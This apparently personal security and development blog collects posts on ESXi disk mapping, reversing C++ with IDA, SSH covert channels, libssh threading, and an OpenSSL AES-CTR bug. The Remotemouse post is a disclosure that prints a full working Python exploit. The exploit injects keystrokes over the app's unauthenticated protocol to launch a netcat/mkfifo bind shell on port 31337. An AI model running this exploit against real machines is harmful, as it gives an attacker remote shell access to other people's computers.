Adding physical drives to VMware ESXi

I built a new lab environment at home, using VMWare ESXi 5.0, which is a very nice product, if we expect the windows-only GUI 1GB HDD needed to install bloatware. You can do pretty much anything from there, except something that looks so important that I wonder why it’s not on the windows GUI: mapping local disks to VMs.

I made this little post as a reminder for myself rather than a full tutorial. You can get more info on http://blog.davidwarburton.net/2010/10/25/rdm-mapping-of-local-sata-storage-for-esxi, on which this post is based.

In a nutshell:

  1. log on vmware ESXi as root.
  2. locate the name of your fs in /vmfs/devices/disks/, i.e. “/vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW
  3. go to where you want to copy it. I suggest you create a directory in a datastore for this, like “/vmfs/volumes/datastore1/harddisks/
  4. vmkfstools -z /vmfs/devices/disks/t10.ATA_____Hitachi_HDT725025VLA380_______________________VFL104R6CNYSZW Hitashi250.vmdk
  5. In your VM, use “attach existing virtual disk” and browse the harddisks directory on datastore.
  6. On linux, you will need “rescan-scsi-bus” to have you new hard disk detected.
  7. Profit

Remotemouse considered harmful

The problem

This weekend I found a nice application to control my mac from my iPhone. It’s Remotemouse from http://www.remotemouse.net.

Unfortunately, when testing I found out that there was no pairing request nor any authentication… I just fired up wireshark to see what was happening and as expected, it’s a very dump cleartext protocol that indicates mouse gestures, clicks, and keyboard events.

I took my editor and went with this little script that connects to my mac, put the mouse on the upper right corner (over the search lense), click it and search for the terminal. Opens it and launches a bindshell.

Remotemouse is binding on all interfaces, ipv4 and ipv6, so if you’re using it and allow direct connections from the outside, you are vulnerable.

The code


#!/usr/bin/python
# Remote exploit against remotemouse (www.remotemouse.net)
#
# Launches a remote shell on macosx leopard
#
# Aris Adamantiadis
#
# aris@darkforce:~/synchronized/hack/remotemouse$ python hackmac.py
# enjoy your shell !!
# Connection to 192.168.1.3 31337 port [tcp/*] succeeded!
# sh: no job control in this shell
# aris@aris-laptop:~$ id
# id
# uid=501(aris) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),
# 401(com.apple.access_screensharing),204(_developer),100(_lpoperator),
# 98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),
# 61(localaccounts),12(everyone),501(access_bpf)
# aris@aris-laptop:~$ exit

import time
import socket
import os
right = "mos 6m 9 0"
up = "mos 6m 0 -9"
diag = "mos 6m 9 -9"
fineup = "mos 6m 0 -1"
fineright = "mos 6m 1 0"
key = "key1 "
click = "mos 5R l d" + "mos 5R l u"
host = "192.168.1.3"
shellcode = "while true ; do rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 31337 >/tmp/f ; done&clear;exit"

def keys(v):
f=""
for i in v:
f+= key + i
return f

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,1978))
s.send(up * 200 + right * 400 + fineup * 9 + fineright *9)
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(1)
s.connect((host,1978))
s.send(click)
time.sleep(1)
s.send(keys("terminal"))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.send(keys(shellcode))
time.sleep(.5)
s.send("key3 RTN")
time.sleep(.5)
s.close()
print "enjoy your shell !!"
os.system("nc -v " + host + " 31337")

Reversing C++ programs with IDA pro and Hex-rays

Introduction

During my holidays, I had plenty of time to study and reverse a program, which was completely coded in C++. This was the first time I seriously studied a C++ codebase, using IDA as the only source of information, and found it quite hard.

Here’s a sample of what you get with Hex-rays when you start up digging into an interesting function:

v81 = 9;
v63 = *(_DWORD *)(v62 + 88);
if ( v63 )
{
   v64 = *(int (__cdecl **)(_DWORD, _DWORD, _DWORD,
   _DWORD, _DWORD))(v63 + 24);
   if ( v64 )
     v62 = v64(v62, v1, *(_DWORD *)(v3 + 16), *(_DWORD
     *)(v3 + 40), bstrString);
}

It’s our job to add symbol names, identify classes and set up all the information to help hex-rays in giving us a reliable and certainly understandable output:

padding = *Dst;
if ( padding < 4 )
  return -1;
buffer_skip_bytes(this2->decrypted_input_buffer, 5u);
buffer_skip_end(this2->decrypted_input_buffer, padding);
if ( this2->encrypt_in != null )
{
  if ( this2->compression_in != null )
  {
    buffer_reinit(this2->compression_buffer_in);
    packet_decompress(this2,
      this2->decrypted_input_buffer,
      this2->compression_buffer_in);
    buffer_reinit(this2->decrypted_input_buffer);
    avail_len = buffer_avail_bytes(this2->compression_buffer_in);
    ptr = buffer_get_data_ptr(this2->compression_buffer_in);
    buffer_add_data_and_alloc(this2->decrypted_input_buffer, ptr, avail_len);
  }
}
packet_type = buffer_get_u8(this2->decrypted_input_buffer);
*len = buffer_avail_bytes(this2->decrypted_input_buffer);
this2->packet_len = 0;
return packet_type;

Of course, Hex-rays is not going to invent the names for you, you’ll still have to make sense of the code and what it means to you, but at least, being able to give a name to the classes will certainly help.

All my samples here have been compiled either with visual studio or Gnu C++. I have found the results to be similar, even if they may not be compatible. Fix it for your compiler of interest.

Structure of a C++ program

It is not my goal to teach you how OOP works, you already know that. We’ll just see how it works (and is implemented) in the big lines.

Class = data structure + code (methods).

The data structure can only be seen in the source code, when the methods will appear in your favorite disassembler.

Object = memory allocation + data + virtual functions.

The object is an instantiation of a class, and something you can observe in IDA.  An object needs memory, so you will see a call to new() (or a stack allocation), a call to a constructor and a destructor. You will see accesses to its member variables (embedded objects) and maybe calls to virtual functions.

Virtual functions are silly: it is hard to know, without running the program with breakpoints, what code is going to be executed at runtime (and disassemble it).

Member variables are a bit easier: they work like their counterpart in C (structs), and IDA has a very handy tool to declare structures, and hex-rays handles them very well in the disassembly. Let’s go back to the bits and bytes.

Object creation

int __cdecl sub_80486E4()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  sub_8048846(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Here’s the decompilation of a small test program I compiled with G++. We can see the new(8), which means our object is 8 bytes long, even if that doesn’t mean we have 8 bytes of variables.

The function sub_8048846 called just after the new() takes the pointer as parameter, and certainly is the constructor.

The next function call is a little cryptic. It’s doing two pointer deferences on v0 before calling it. It’s a virtual function call.

All polymorphic objects have a special pointer in their variables, called the vtable. This table contains addresses of all the virtual methods, so the C++ program can call them when needed. In the compilers I could test, this vtable is always the first element of an object, and always stays at the same place, even in subclasses. (This could no stay true for multiple inheritance. I did not test).

Let’s do some IDA magic:

Rename the symbols

Just click on a name, press « n » and give a meaningful name. Since we don’t know yet what our class do, I suggest we name the class « class1 », and use this convention until we’ve understood what our class do. It’s very possible that we’re going to discover other classes before we finished digging class1, so I suggest we simply continue naming classes as we find them.

int __cdecl main()
{
  void *v0; // ebx@1
  v0 = (void *)operator new(8);
  class1::ctor(v0);
  (**(void (__cdecl ***)(void *))v0)(v0);
  if ( v0 )
    (*(void (__cdecl **)(void *))(*(_DWORD *)v0 + 8))(v0);
  return 0;
}

Create structures

The « structures » window of IDA is very useful. Type Shift-F9 to make it appear. I suggest you pull it off (in the QT IDA version) and put it on the right of the IDA window, so you can see both the decompile window and the structures.

Press « ins » and create a new structure « class1 ». Since we know that this structure is 8 bytes long, add fields (using key « d ») until we have two « dd » fields. Rename the first to vtable, since yes, that’s what we got here !

Now, we’re going to add typing information in our function. Right-click on v0, « Convert to struct * », select « class1 ». Alternatively, pressing « y » and typing in « class1 * » will give you the same result.

Create a new structure, of 12 bytes, and call it « class1_vtable ». At this state, we cannot really know how big that vtable is, but changing the structure size is very easy. Click on « vtable » in class1’s declaration, and type « y ». Now, declare it as a « class1_vtable * » object. Refresh the pseudocode view, and watch the magic.

We can rename the few methods to « method1 » to « method3 ». Method3 is certainly the destructor. Depending on the programming convention and the compiler used, the first method often is the destructor, but here’s a counterexample. It is time to analyze the constructor.

Analysis of the constructor

int __cdecl class1::ctor(void *a1)
{
  sub_80487B8(a1);
  *(_DWORD *)a1 = &off_8048A38;
  return puts("B::B()");
}

You can start by setting the typing information we already know on « a1 ». The puts() call confirms our thoughts that we are in a constructor, but here we even learn the name of the class.

« sub_80487B8() » is called directly in the constructor. This can be a static method of class1, but it can also be a constructor of a parent-class.

« off_8048A38 » is the vtable of class1. By looking there, you will be able to find out how big is our vtable (just watch the next pointer that has an Xref), and a list of the virtual methods of « class1 ». You can rename them to « class1_mXX », but beware that some of these methods may be shared with other classes.

It is possible to set typing information on the vtable itself (click on it, « y », « class1_vtable »), but I do not recommend it since you lose the classic view in IDA, and it doesn’t provide anything you can’t see in the classic view.

The strange call in the constructor

int __cdecl sub_80487B8(int a1)
{
  int result; // eax@1
  *(_DWORD *)a1 = &off_8048A50;
  puts("A::A()");
  result = a1;
  *(_DWORD *)(a1 + 4) = 42;
  return result;
}

The call to the « sub_80487b8() » function in the constructor reveals us the same type of function: a virtual function table pointer is put in the vtable member, and a puts() tells us we’re in yet another constructor.

Don’t retype the type « class1 » for argument « a1 », since we’re not dealing with class1. We found a new class, that we will call « class2 ». This class is a superclass of class1. Let’s do the same work as in class1. The only difference it that we do not know exactly the size of its member. There are two ways of figuring it out:

  • Look at the xrefs of class2 ::ctor. If we find a straight call to it after a new (i.e. an instantiation), we know the size of its members.
  • Look at the methods in the vtable, and try to guess what’s the highest member ever accessed.

In our case, « class2 ::ctor » accesses the 4 bytes after the 4 first ones and set it to 42. Since its child-class « class1 » is 8 bytes long, so is « class2 ».

Do the same procedure with all the subclasses, and give names to the virtual functions, starting from the parent classes to the children.

Study of the destructors

Let’s go back to our main function. We can see that the last call, before our v0 object becomes a memory leak, is a call to the third virtual method of class2. Let’s study it.

if ( v0 )
  ((void (__cdecl *)(class1 *))
    v0->vtable->method_3)(v0);
…
void __cdecl class1::m3(class1 *a1)
{
  class1::m2(a1);
  operator delete(a1);
}
…
void __cdecl class1::m2(class1 *a1)
{
  a1->vtable = (class1_vtable *)&class1__vtable;
  puts("B::~B()");
  class2::m2((class2 *)a1);
}
…
void __cdecl class2::m2(class2 *a1)
{
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::~A()");
}

What we can see here is the following: class1 ::m3 is a destructor, which calls class1 ::m2 which is the main destructor of class1. What this destructor do is ensure that we’re well in « class1 » context, by setting back the vtable to is « class1 » state. It then calls the destructor of « class2 », which also sets the vtable to « class2 » context. This method can also be used to walk through the whole class hierarchy, since the virtual destructors must always be called for all the classes in the way.

Hey, what are all these casts? Why do I have two structures defining the same fields?

What we have here is exactly the same problem that you get when doing OOP with C : You end up with several fields declared in all the subclasses. Here is what I do to avoid redefinition of fields:

  • For each class, define a classXX_members, classXX_vtable, classXX structure.
  • classXX contains
    • +++ vtable (typed to classXX_vtable *)
    • +++ classXX-1_members (members of the superclass)
    • +++ classXX_members, if any
      • classXX_vtable contains
      • +++classXX-1_vtable
      • +++classXX’s vptrs, if any

 

Ideally, you should start from the main class to the children, until you end up in an edge class. In our exemple, here’s the « solution » of our sample:

 

00000000 class1          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 class2_members  class2_members ?
00000008 class1          ends
00000008
00000000 ; ----------------------------------------------00000000
00000000 class1_members  struc ; (sizeof=0x0)
00000000 class1_members  ends
00000000
00000000 ; ----------------------------------------------00000000
00000000 class1_vtable   struc ; (sizeof=0xC)
00000000 class2_vtable   class2_vtable ?
0000000C class1_vtable   ends
0000000C
00000000 ; ----------------------------------------------00000000
00000000 class2          struc ; (sizeof=0x8)
00000000 vtable          dd ?                    ; offset
00000004 members         class2_members ?
00000008 class2          ends
00000008
00000000 ; ----------------------------------------------00000000
00000000 class2_vtable   struc ; (sizeof=0xC)
00000000 method_1        dd ?                    ; offset
00000004 dtor            dd ?                    ; offset
00000008 delete          dd ?                    ; offset
0000000C class2_vtable   ends
0000000C
00000000 ; ----------------------------------------------00000000
00000000 class2_members  struc ; (sizeof=0x4)
00000000 field_0         dd ?
00000004 class2_members  ends
00000004
int __cdecl main()
{
  class1 *v0; // ebx@1
  v0 = (class1 *)operator new(8);
  class1::ctor(v0);
  ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.method_1)(v0);
  if ( v0 )
    ((void (__cdecl *)(class1 *)) v0->vtable->class2_vtable.delete)(v0);
  return 0;
}
int __cdecl class1::ctor(class1 *a1)
{
  class2::ctor((class2 *)a1);
  a1->vtable = (class1_vtable *)&class1__vtable;
  return puts("B::B()");
}
class2 *__cdecl class2::ctor(class2 *a1)
{
  class2 *result; // eax@1
  a1->vtable = (class2_vtable *)&class2__vtable;
  puts("A::A()");
  result = a1;
  a1->members.field_0 = 42;
  return result;
}

In brief

  • When you find a new class, give a symbolic name, and resolve the whole tree before figuring out what should be its real name
  • Start from the ancestor and go up to the children
  • Look at the constructors and destructors first, check out the references to new() and static methods.
  • Often, the methods of a same class are located close to each other in the compiled file. Related classes (inheritance) may be far away from each other. Sometimes, the constructors are inlined in childclasses constructors, or even at the place of the instantiation.
  • If you want to spare time when reversing huge inherited structures, use the struct inclusion trick to name variable only once.
  • Use and abuse Hex-rays’ typing system, it’s very powerful.
  • Pure virtual classes are hell : you can find several classes having similar vtables, but no code in common. Beware of them.

Sources

Try this at home !
The binary (elf32 stripped)

The source file. Don’t open it too fast !
 

SSH[12] protocol weakness ?

A weakness ?

While reading the actual posts around the allegations of a so-called backdoor in the OpenBSD IPSec code, which would have been inserted by the FBI through a developer, some comments have been posted on both Slashdot and LWN about “long-standing bugs in SSH2″. The page which details the criticism can be found here. These comments were done by Bernard Perrot when he was patching OpenSSH to comply with the (dumb) restrictions to the use of cryptography in France by the French law.

“I often like to point out an incomprehensible weakness of the protocol concerning the “padding” (known as covered channel): in both version 1 and 2 the packets, have a length which is a multiple of 64 bits, and are padded with a random number. This is quite unusual and therefore sparing a classical fault that is well known in encrypting products: a “hidden” (or “subliminal”) channel. Usually , we “pad” with a verified sequence as for example, give the value n for the byte rank n (self describing padding). In SSH, the sequence being (by definition) randomized, it cannot be checked. Consequently, it is possible that one of the parties communicating could pervert / compromise the communication for example used by a third party who is listening. One can also imagine a corrupted implementation unknown by the two parties (easy to realize on a product provided with only binaries as generally are commercial products). This can easily be done and in this case one only needs to “infect” the client or the server. To leave such an incredible fault in the protocol, even though it is universally known that the installation of a covered channel in an encryption product is THE classic and basic way to corrupt the communication, seems unbelievable to me . It can be interesting to read Bruce Schneier’s remarks concerning the implementation of such elements in products influenced by government agencies. (http://www.counterpane.com/crypto-gram-9902.html#backdoors).”

The author says that SSH1 and SSH2 are vulnerable to covert-channel attack.

Covert-channel attacks

A covert-channel attack is an attack in which an attacker makes use of a protocol to embed data inside it, with the objective of evading intrusion detection software, antivirus, etc. simply to not get caught. The covert-channels exist in almost every protocols at all layers. Hackers used to embed covert rootshells inside ICMP ping datagrams, udp, inside HTTP, inside HTML comments, …

Basically, any protocol that allows two different ways of communicating the same information is vulnerable (and heck most protocols have a lot of ways present the same data in different forms).

A Covert-channel attack is possible on SSH2, by at least two means, as described in the referenced paper :

  • The padding field is said to contain purely random padding. The goal of the padding field is to pad the packet in order to get the whole packet a multiple of the blocksize (a blocksize is the size of cleartext being encrypted/decrypted after each call to a cryptographic routine). It has no cryptographic intent, its content is not checked, but however, it’s encrypted and part of the HMAC (a HMAC primitive is a symmetric and fast tool to verify the integrity of data).
    In order to act as a covert channel, this field has to be filled in by either the SSH server or SSH client, because it is encrypted. Any attempt to change it during the transport will be seen because the HMAC won’t match.
  • There are specific packet types (SSH_IGNORE and SSH_DEBUG) which implementations should accept but discard immediately. Of course, these packets are the best place to insert any data you’d like to send over the encrypted session, but in this case you still need to have a corrupted server and client.

My point here is that these covert channels do exist, but there’s nothing you can do about it at all. The idea of an encrypted session is to ensure the confidentiality end to end. That confidentiality means that you’re free to send any data you want, and nobody will know about it. That also the point on the SSH RFC, 9.3.6 page 20 : the protocol was not designed to avoid covert channels.

Conclusion

My conclusion is simple : it’s not a bug, it’s a feature. Call me when it’s possible to insert data into an encrypted SSH data stream, without knowledge of the session key. At the best of my experience, there is no way to insert data into a stream without altering the integrity of a packet and thus being detected by either of the parties.

If the parties are compromised, there’s no covert channel. One could simply open a channel with its own malicious data and nobody will know. I’m also curious to see how one would design a protocol to transmit encrypted, confidential and arbitrary data which is immune to covert channel attacks, when both sides are compromised. If the attacker couldn’t hide data in the protocol, he’d hide it in the transmitted data.

Threading design pattern ?

When designing the new libssh architecture, we decided to make it completely callback-based, even internally. This provide cool features, like the possibility to extend libssh without recompiling it, or executing more easily asynchronous or nonblocking functions. Libssh 0.5 will run as a state machine, which listen for packets, and then calls callbacks from the packet type. The handlers will evaluate the current state of the session and what to do with packets. Sometimes, the state of the session itself changes as the result of a packet (e.g. when receiving a SSH_AUTH_SUCCESS packet).

A sequence diagram of a synchronous function such as authentication or simple channel read can be systematized as following:

What’s happening is pretty straightforward. The thread X is waiting for a specific packet x (or more precisely, the internal state change caused by packet x). It calls a function called ProcessInput (this is a simplification) which itself locks itself and tries to read packets from the socket. After a packet has been read, the callback for the packet (in this case, x) is called, which updates the internal state of the session.

ProcessInput returns after reading one packet. X verifies that the state changes to x, otherwise, it simply tries a ProcessInput again (not on the drawing) until it receives a state change it can process.

Then, what’s the problem ?

I though that this design could provide an interesting feature to libssh users. By adding a lock in the ProcessInput function (already on the previous drawing), we could let applications call different libssh functions on a same session, simultaneously, in different threads. Thread X could be doing a blocking ssh_channel_read() on one channel while thread Y could be doing the same on another. A naive implementation of locking would give this result :

This sequence diagram is a simple extension of the previous one. Thread X waits for a packet x, and thread Y wait its turn by using a lock (or semaphore) in ProcessInput(Y). Looks great, except there’s a downfall. This exemple does not work if the first packet to show up is not an x packet :

In this example, the x packet never arrives. the ProcessInput called by the X thread receives the y packet and do process it (after all, all threads can manipulate the internal state of the session). The problem is that after ProcessInput has processed the y packet (and left X unhappy and looping in hope of receiving the x packet), ProcessInput(Y)’s lock was released, and Y is doing a packet read, which can be blocking and make the Y thread wait for a moment. This is unfortunate because Y was in the correct state y before calling ReadPacket. Unfortunately, ProcessInput is meant to be generic enough and doesn’t know anything about the x or y states.

I’m looking for some kind of design pattern, or elegant solution to resolve this problem, by those who already resolved this problem before me.

Potential solution ?

I have though of two solutions:

  • A lock would “remember” it was blocked by another thread, would wait until the lock is free and then directly return to the caller. This way, our Y thread would not run the potentially blocking ReadPacket function, in the case thread X made the hard work for him. In the opposite case (our second example), Y would call ProcessInput a second time and catch the y packet soon or later.
    Unfortunately, I do not see an elegant way of doing this with the common denominator building blocks of pthread and win32 threads. It doesn’t look like an elegant solution to me, but it complies with the specification “ProcessInput returns when at least one packet has been read since the call for ProcessInput”.
  • A received packet counter would be read at the start of the ProcessInput function and stored in the local stack. The packet counter would then be incremented each time a packet is received in the session, and after entering in the critical area of ProcessInput, the values would be compared. If it changed, ProcessInput would return.
    I suspect this scenario is vulnerable to races between the moment the function is called and the counter is read. Nothing tells us that another thread did not just finish to read the y packet before we initialize the local packet counter.
  • The ProcessInput function would take an additional parameter which would help it to tell if the ReadPacket function is still worth being called. This could be a callback to be called just after acquiring the lock. For instance, Y could call ProcessInput with a specific callback function check_y() which checks if the status has changed by action of the y packet. This function could also be called by the Y function itself in the ProcessInput loop, since it’s somewhat the termination condition for the loop.
    As a drawback, I think this solution adds additional binding between the ProcessInput function and the potential callers (there are hundreds of them in libssh master) and may add too much complexity.

What’s your opinion ? Feel free to comment !

Aris

Debugging a cryptographic bug in libssh…

Hey there, you may know I am a developer of the SSH Library libssh. Last week, a post on the libssh mailing list was reporting a connection problem under Redhat RHEL 4.8. It seemed that the new cipher aes128-ctr, recently implemented in libssh, had a little problem…

This bug looked strange, firstly because we never ever had any cryptographic problems within libssh, secondly because the debugging did not report something broken :

[3] Set output algorithm to aes256-ctr
[3] Set input algorithm to aes256-ctr

[3] Writing on the wire a packet having 17 bytes before
[3] 17 bytes after comp + 10 padding bytes = 28 bytes packet
[3] Encrypting packet with seq num: 3, len: 32
[3] Sent SSH_MSG_SERVICE_REQUEST (service ssh-userauth)
[3] Decrypting 16 bytes
[3] Packet size decrypted: 44 (0x2c)
[3] Read a 44 bytes packet
[3] Decrypting 32 bytes
2010-04-12 13:14:54,211557; 1126189408 procSrvAuth; Did not receive SERVICE_ACCEPT

While giving on the OpenSSH side :

sshd[22341]: debug1: SSH2_MSG_NEWKEYS sent
sshd[22341]: debug1: expecting SSH2_MSG_NEWKEYS
sshd[22341]: debug1: SSH2_MSG_NEWKEYS received
sshd[22341]: debug1: KEX done
sshd[22341]: Disconnecting: Corrupted MAC on input.

What does this mean ?

libssh was sending garbage and did receive some kind of garbage (a variation of the last error showed a HMAC error). However, the “size” field of the SSH packet (the first 32 bits of every packet) was consistent with the type of packet being received. So what ?
Further analysis of the received plaintext on both openssh and libssh showed that the first 16 bytes of the first packet in each direction were correct. So, this was a bug that was affecting the whole stream excepted the first block of blocksize bytes. The code in libssh producing aes128-ctr is the following:

static void aes_ctr128_encrypt(struct crypto_struct *cipher, void *in, void *out,
unsigned long len, void *IV) {
unsigned char tmp_buffer[128/8];
unsigned int num=0;
/* Some things are special with ctr128 :
* In this case, tmp_buffer is not being used, because it is used to store temporary data
* when an encryption is made on lengths that are not multiple of blocksize.
* Same for num, which is being used to store the current offset in blocksize in CTR
* function.
*/
AES_ctr128_encrypt(in, out, len, cipher->key, IV, tmp_buffer, &num);
}

Then, how does aes-ctr work ?

CTR is a stream cipher mode build on top of a block cipher. In SSH, it’s used like a block cipher anyway. It has two interesting characteristics:

  • The same code is used for encryption and decryption, because it produces a OTP-like stream of bytes
  • The key is used for the block cipher encryption and the input to the algorithm is a nounce together with a counter

That’s where things begin to be interesting. In our code, IV is used as a nounce and is generated from the cryptographic parameters during the key exchange. I have verified its initial value was consistent with the valid (working) implementation. tmp_buffer is a buffer used for internal operations of the cipher. It’s normally not important. The num variable is used to report how far we are in the encryption of the local block, in order to emulate a stream cipher. We are not using this feature (SSH always encrypts packets multiple of the blocksize), so the returned value is always 0.

So now, how goes that libssh with OpenSSL 0.9.8 on my desktop and OpenSSH on RHEL 4.8 work like a charm, and libssh with OpenSSL 0.9.7a on RHEL/CentOS 4.8 does not ?

I had to go one step further and look what could be wrong in the way I am using the AES_ctr128_encrypt function. I looked at the code of OpenSSL 0.9.8 and found this:

* increment counter (128-bit int) by 1 */
static void AES_ctr128_inc(unsigned char *counter) {
unsigned long c;

/* Grab bottom dword of counter and increment */
c = GETU32(counter + 12);
c++; c &= 0xFFFFFFFF;
[...]

This is the code used to increment the counter. And now the surprise in the sources of OpenSSL 0.9.7a :

/* increment counter (128-bit int) by 2^64 */
static void AES_ctr128_inc(unsigned char *counter) {
unsigned long c;

/* Grab 3rd dword of counter and increment */
#ifdef L_ENDIAN
c = GETU32(counter + 8);
[...]

What does that mean ? It means that the counter incrementation is not the same between the two versions of AES-CTR128 ! OpenSSL has a bad and a correct version of the implementation of AES-CTR128. You can find that the CVS commit fixing this dates back from 2003. I found that OpenSSL 0.9.7c fixes the issue. Of course, no documentation explains that difference and nothing in the header files let you know if you’re in front of a broken or working implementation (I would have expected a #define in the working version).

By studying the sources of OpenSSH, I found that they were not affected by the bug because they implemented the CTR encoding by their own. Not wanting to do this, I simply deactivated the compilation of the CTR algorithms on libssh on broken OpenSSL. Yop, “Fixed!”.

Lessons learned

These things are important when you’re debugging a cryptographic thing that produces garbage:

  • Verify the input. Garbage in, garbage out
  • Verify the derivative input like IV. Even a single error of one bit can change the output to garbage
  • Verify the output. It’s possible that the output of the cryptographic algorithm you’re using is good, it’s just not what the other party is reading and trying to decrypt …
  • Verify you’re using correctly the crypto. When the only doc you have, like with libcrypto, is the header file, then read the source.
  • If all of this did not work… read the source of the crypto and find what’s the difference between the working implementation and the wrong implementation. Maybe it’s something you did not understand and used wrongly, maybe …

My new blog

Hi there !

After some solicitation from third parties (read: libssh developers), I finally installed a real blog to replace more or less my wiki-based website. I’m going to discuss some things about libssh development, thoughts about programming, networks, computer security and internet.

I’ll take the occasion to tell about the FOSDEM convention that took place this week-end. Awesome meeting of opensource developers, it was a great occasion to meet people, in particular Andreas which is a libssh developer as well. It’s also interesting to note that this is the fist time FOSDEM is connected to the IP world through BELNET (note: I work for BELNET). FOSDEM was connected to BELNET on IPv4 and IPv6 using fiber, and this bandwidth was distributed to users through WiFi access points distributed in the ULB campus. The bandwidth used peaked around 100 Mbit/s (a poor 1/10th of the available bandwidth) due to technical limitation of airwaves, but I’m sure the tech staff will find a solution for next year. Also interesting to note, an IPv4 was available for each participant (two /19 were allocated) and the IPv6/IPv4 enabled ratio was around 90%.

I’m looking forward for more good stuff next year !